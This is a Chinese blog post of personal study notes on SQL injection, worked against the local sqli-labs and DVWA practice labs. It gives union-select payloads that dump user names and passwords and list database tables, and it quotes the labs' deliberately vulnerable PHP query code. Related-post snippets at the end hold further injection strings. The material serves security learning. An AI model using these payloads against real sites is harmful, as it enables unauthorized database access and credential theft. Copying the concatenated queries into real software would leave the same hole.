sql注入练习

最新推荐文章于 2024-04-01 21:31:59 发布
最新推荐文章于 2024-04-01 21:31:59 发布
阅读量252 收藏
点赞数
分类专栏: 学习笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41750748/article/details/103867112
版权

第一题

 http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,(select group_concat(concat_ws(0x7e,username,password))from users),3 --

在这里插入图片描述
第二题

http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,(select group_concat(concat_ws(0x7e,username,password))from users),3

在这里插入图片描述

dvwa 注入练习

low 级别
先调成low
在这里插入图片描述
查看代码结构 从而进行分析
在这里插入图片描述
代码

<?php

if( isset( $_REQUEST[ 'Submit' ] ) ) {
// Get input
$id = $_REQUEST[ 'id' ];

// Check database
$query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
$result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

// Get results
while( $row = mysqli_fetch_assoc( $result ) ) {
    // Get values
    $first = $row["first_name"];
    $last  = $row["last_name"];

    // Feedback for end user
    echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
}

mysqli_close($GLOBALS["___mysqli_ston"]);
}

?>

那么我们首先爆出它的库试试,用单引号让id闭合

输入 1’ union select 1,database() – 提交
在这里插入图片描述
拖库结果

1' union select 1,concat(user,password) from users --

在这里插入图片描述

Medium等级

在这里插入图片描述

使用bp抓包方式

查看代码

	<?php

if( isset( $_POST[ 'Submit' ] ) ) {
// Get input
$id = $_POST[ 'id' ];

$id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id);

$query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query) or die( '<pre>' . mysqli_error($GLOBALS["___mysqli_ston"]) . '</pre>' );

// Get results
while( $row = mysqli_fetch_assoc( $result ) ) {
    // Display values
    $first = $row["first_name"];
    $last  = $row["last_name"];

    // Feedback for end user
    echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
}

}

// This is used later on in the index.php page
// Setting it here so we can close the database connection in here like in the rest of the source scripts
$query  = "SELECT COUNT(*) FROM users;";
$result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
$number_of_rows = mysqli_fetch_row( $result )[0];

mysqli_close($GLOBALS["___mysqli_ston"]);
?>

发现有这样的一句话: $ id = mysql_real_escape_string($id );
这句话是干什么用的呢?百度了一下知道

mysql_real_escape_string函数是实现转义 SQL 语句字符串中的特殊字符,如输入单引号’则处理时会在其前面加上右斜杠\来进行转义,如果语句错误则输出相应的错误信息。其中受影响的字符如下:

\x00 \n \r \ ’ " \x1a

那我们换这样的注入方式 只要不用’就行

id=2 union select 1,table_name from information_schema.tables wheretable_schema=(select database()) -- &Submit=Submit

在这里插入图片描述

闹萌
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql 注入练习
可乐的博客
02-16 4508
sql注入习题 来源于ctfs.me的一道习题,实在做不出来,google了wp,发现这道题目是引自于其他习题集了,而且原题目是有源码的。。。于是趁机把他的题目做了一遍 http://35.184.20.243:8003/ &lt;——sql注入靶场地址 level1 这道题目其实没有源码也是可以做的,不过需要简单思考一下 $query = "SELECT * FROM secrets...
sql注入学习
wssmiss的博客
07-10 274
sql注入的简单介绍 sql注入的原理; 攻击者利用web应用程序对用户输入验证上的疏忽,在输入的数据中包含对某些数据库系统游曳数意义的负号或命令,让攻击者有机会直接对后台数据库系统下达指令,进而实现对后台数据库乃至整个应用系统的入侵 代码示例 正常情况: 一个登陆界面,用户输入用户名和密码后,如id=112145 ,password=abcd 其php连接后台数据库执行的代码是 select...
sql注入相关考题
安全界的彭于晏的博客
06-24 833
1.SQL注入的原理 用户 可控参数中注入SQL语法,破坏原有SQL结构, 达到编写程序时意料之外结果的攻击行为 某成因可以归结为以下两个原因叠加造成的: 1.程序编写者在处理应用程序和数据库交互时, 使用字符串拼接的方式构造SQL语句。 2.未对用户可控参数进行足够的过滤便将参数内容拼接进入到SQL查询语句中。 2.sql注入产生原因 sql注入攻击是利用是指利用设计上的漏洞, 在目标服务器上运行Sql语句以及进行其他方式的攻击, 动态生成Sql语句时没有对用户
sql注入一般流程(附例题)
热门推荐
Battery的博客
08-03 14万+
在与服务器数据库进行数据交互的地方拼接了恶意的sql代码,达到欺骗服务器执行恶意代码的目的。本质上是程序把用户输入的数据当成了sql语句执行。
sql注入1-10题
Camillewuxie的博客
02-08 632
sql注入 Less-1-10题 首先输入?id=1观察页面,发现能登陆, 使用联合注入 (1) 查找几个字段(需输入错误id) ?id=0‘ order by 3–+页面正常 输入?id=0‘ order by 4–+页面错误,说明有三个字段 (2) 爆数据库名 ?id=0’ union select 1,(select database()),3–+ 爆出数据库名 security。 (...
SQL注入的相关例题(ctfhub)
最新发布
2401_82388450的博客
04-01 894
例题。
SQL注入专题(一)
彩色代码的博客
05-18 217
SQL注入(SQL Injection)是一种常见的安全漏洞,它允许攻击者通过将恶意的SQL代码插入到应用程序的输入字段中,从而执行非授权的数据库操作。这些只是SQL注入的一些常见示例,实际情况可能更为复杂。为了防止SQL注入攻击,应使用参数化查询或预编译语句,使用安全的API和框架,并对用户输入进行充分验证和转义。
sql注入练习工具
11-08
SQL注入是一种常见的网络安全漏洞,它发生在应用程序未能充分验证或过滤用户输入的数据,导致恶意SQL代码被插入到数据库查询中。这种攻击方式可以让攻击者获取、修改、删除数据库中的敏感信息,甚至完全控制数据库...
SQL注入练习.rar
06-25
"SQL注入练习.rar" 提供了一个名为 "sql-labs" 的练习环境,专为学习和提升SQL注入技能设计。这个靶场环境采用闯关模式,由浅入深地涵盖了一系列SQL注入技术,帮助用户逐步理解并掌握这种攻击手段。 在开始之前,...
sqli:SQL注入练习
02-08
通过本“sqli:SQL注入练习”,你将有机会亲手实践如何检测和防止SQL注入,理解其工作原理,并提升你的PHP安全编程能力。同时,了解和掌握这些技能对于任何Web开发者来说都是至关重要的,以保护用户的个人信息和系统...
[SQL注入练习]K8-ASP渗透环境[K8team].rar
05-08
在这个"[SQL注入练习]K8-ASP渗透环境[K8team].rar"压缩包中,包含了一个专门用于学习和实践SQL注入技巧的ASP渗透环境。这个环境可能是由K8team团队创建的,他们可能是一个专注于网络安全研究或培训的组织。 首先,...
sql注入靶场.zip
06-24
靶场的核心是sqli-labs,这是一个开源的SQL注入练习平台,特别适合初学者和专业人士用来增强对SQL注入的理解。它模拟了各种类型的SQL注入漏洞,包括但不限于错误基线注入、时间基线注入、盲注、联合查询注入、堆叠...
SQL注入--靶场练习
wmr123456001的博客
02-11 2052
SQL注入靶场练习
SQL注入练习--sqli-labs
qq_46263951的博客
02-12 2730
前言 SQL注入是比较常见的漏洞,有数据库的地方就可能存在SQL注入,所以学好SQL注入是非常有必要的,sqli-labs是一个不错的练习靶场。推荐一篇文章SQL注入之Mysql注入姿势及绕过总结 前置知识 注入流程 判断是否存在注入,注入是字符型还是数字型,闭合情况,绕过方式 ?id=1' ?id=1" ?id=1') ?id=1") ?id=1' or 1# ?id=1' or 0# ?id=1' or 1=1# ?id=1' and 1=2# ?id=1' and sleep(5)# ?id=
一次简单的SQL注入靶场练习
lza20001103的博客
07-24 4128
一次简单的SQL注入靶场练习
SQLi-LABS 1-22关(Basic Challenges) 手动注入--(缓慢更新中 12/22)
燕麦葡萄干的博客
11-18 3503
首先判断注入类型,分别使用?时间注入是利用sleep()或benchmark()等函数让MySQL的执行时间变长,时间盲注多与if(expr1,expr2,expr3)结合使用,此if语句意思为:如果expr1是TRUE,则if()的返回值是expr2;进入到MySQL所在目录,我这里是D:\software\phpstudy_pro\Extensions\MySQL5.7.26\bin,目录栏直接输入cmd调出cmd终端,输入mysql -u root -p ,然后输入密码即可成功登陆数据库。
sql注入,基础练习1-4关卡
haozhe6666的博客
07-20 383
程序员为了防止sql注入,对用户输入中的单引号(')进行处理,在单引号前加上斜杠(\)进行转义,这样被处理后的sql语句中,单引 号不再具有‘作用’,仅仅是‘内容’而已,换句话说,这个单引号无法发挥和前后单引号闭合的作用,仅仅成为‘内容’;相信大家一定能发现它们之间的微小的区别,这也是数字型和字符型上的一个重要的区别,接下来的注入过程,我们只需要去想方设法的闭合掉 '$id' 前面的'和后面的语句及符号就ok了,然后后面的就是进行正常的一个注入过程了。要进行注入,得先知道是否能进行注入。
PIKACHU靶场 ——字符和数字型SQL注入练习
PICACHU+++的博客
04-03 857
进入靶场可以看见一个输入框,所以现在里面判断注入点类型,在输入框中输入了1'后,报错,并且显示到URL中,判断参数提交方式为GET传参在URL栏中输入了一下语句,判断为字符型SQL注入漏洞1' #报错1'and'1'='1 #未报错1'and'1'='2 #未报错综上为字符型SQL注入漏洞。
日志服务器与日志转发
qq_41750748的博客
12-04 992
实验准备:三台虚拟机(linux的NetworkManager全部是关闭状态,linux不要克隆,新安装一个) 1、一台window虚拟机作为客户端,单网卡: ip:172.16.0.100/255.255.0.0 网关(路由):172.16.0.1(vmnet2) 2、一台linux,作为网关(路由),双网卡 eth0在vmnet2(交换机),ip:172.16...
CTFsql注入练习
07-29
回答: CTFsql注入练习题是一种用于训练和测试SQL注入技巧的题目。在这些题目中,参与者需要通过注入恶意的SQL代码来绕过应用程序的安全机制,从而获取敏感信息或者执行未授权的操作。这些题目通常包含了不同的注入场景和技巧,例如基于时间的盲注、报错注入、布尔盲注、宽字节注入等等。参与者需要通过分析应用程序的行为和结构,构造合适的注入语句来实现攻击目标。在解决这些题目的过程中,参与者可以提高对SQL注入漏洞的理解和掌握,并学习如何防范和修复这类漏洞。 #### 引用[.reference_title] - *1* *2* [CTF-SQL注入入门题型](https://blog.csdn.net/weixin_43080961/article/details/121939366)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down28v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [i 春秋 CTF训练营 web——SQL注入 1(字符型注入)(手动注入)](https://blog.csdn.net/AAAAAAAAAAAA66/article/details/121626527)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down28v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值